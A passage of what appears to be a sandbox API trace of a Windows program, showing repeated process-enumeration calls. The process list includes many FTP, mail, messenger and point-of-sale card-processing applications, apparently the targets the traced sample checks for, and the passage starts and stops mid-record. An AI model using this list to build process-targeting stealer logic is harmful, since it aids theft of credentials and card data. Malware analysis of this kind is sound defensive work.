cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0237.801] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0237.803] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0237.804] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0237.806] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0237.807] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0237.810] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0237.812] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0237.814] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0237.815] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0237.817] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0237.819] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0237.821] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0237.823] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0237.824] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0237.826] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0237.828] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0237.830] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0237.831] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0237.833] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0237.835] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0237.836] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0237.838] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0237.840] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0237.841] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0237.893] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0237.895] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0237.897] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0237.898] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0237.900] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0237.902] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0237.907] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0237.909] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0237.910] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0237.912] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0237.913] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0237.915] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0237.917] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0237.922] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0237.923] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0237.925] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0237.927] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0237.928] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0237.930] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0237.931] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.933] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0237.999] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0238.001] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0238.002] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.004] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0238.005] CloseHandle (hObject=0x17b0) returned 1 [0238.005] Sleep (dwMilliseconds=0x64) [0238.217] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0238.230] Process32First (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.234] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0238.236] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0238.237] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.239] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0238.240] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.241] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0238.243] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0238.244] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0238.246] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.250] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.252] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0238.253] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.254] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.256] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.257] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.304] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.305] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.307] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.308] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0238.310] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0238.314] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0238.315] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.316] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.318] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0238.319] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0238.321] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0238.322] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.324] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0238.360] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0238.362] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.364] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0238.365] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0238.367] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: 